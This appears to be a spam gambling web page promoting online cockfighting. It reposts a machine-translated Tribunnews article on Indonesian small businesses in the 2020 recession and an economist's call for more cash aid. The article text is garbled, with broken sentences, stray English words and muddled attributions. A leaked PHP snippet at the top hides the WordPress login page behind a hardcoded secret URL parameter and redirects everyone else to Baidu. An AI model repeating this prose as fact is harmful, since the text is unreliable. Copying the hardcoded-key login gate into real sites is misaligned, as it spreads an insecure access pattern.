//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Ekonom di ambang resesi: Situasi UMKM sangat berbeda dengan krisis 2008, silakan tambahkan BLT | download game adu ayam_s128live_situs sabung ayam online

Ekonom di ambang resesi: Situasi UMKM sangat berbeda dengan krisis 2008, silakan tambahkan BLT

Laporan reporter Tribunnews.com Reynas Abdila-Jakarta TRIBUNNEWS.COM-Usaha Mikro dan Kecil Menengah (UMKM) merupakan salah satu industri yang terdampak pandemi Covid-19, perlahan mengubah perekonomian Indonesia.

Jika pada krisis terakhir tahun 1998 dan 2008, usaha kecil, menengah dan mikro masih memiliki ketahanan yang kuat, situasinya cukup berbeda dibandingkan dengan krisis akibat pandemi corona.

Bhima Yudhistira of Economics and Finance (Indef), Ekonom Institute of Development Studies, mengatakan dibandingkan dengan dua periode krisis sebelumnya, situasi usaha kecil, menengah dan mikro akan sangat berbeda, karena pada tahun 2020 hal ini tidak hanya akan terjadi. Sektor keuangan, dan fisik termasuk UMKM yang sulit digerakkan.

“Jadi UMKM pun butuh bantuan untuk mendorong pemulihan ekonomi. (Krisis, red) Pada 2008 tidak terjadi pandemi karena krisis keuangan, ketika UMKM masih bisa menjual secara normal,” kata Bhima dalam sepekan Salah satunya (28/9/2020) mengatakan bahwa Bhima mengusulkan untuk meningkatkan Bantuan Langsung Tunai (BLT) kepada UMKM untuk membantu UMKM yang mungkin mengalami depresi akibat resesi ekonomi Struck, karena nilai nominalnya masih terlalu rendah dan memerlukan pengawasan yang ketat. Bhima mengatakan: “Belum tentu.” Menurut Bhima, mekanisme pemantauan yang lemah membuat UMKM kurang efektif dalam menstimulasi BLT. .

Bhima menjelaskan bahwa saat ini hanya 13% UMKM yang tergabung dalam platform digital, sehingga membutuhkan nasehat dan dukungan dari pemerintah pusat dan daerah.

Leave a Comment

download game adu ayam_s128live_situs sabung ayam online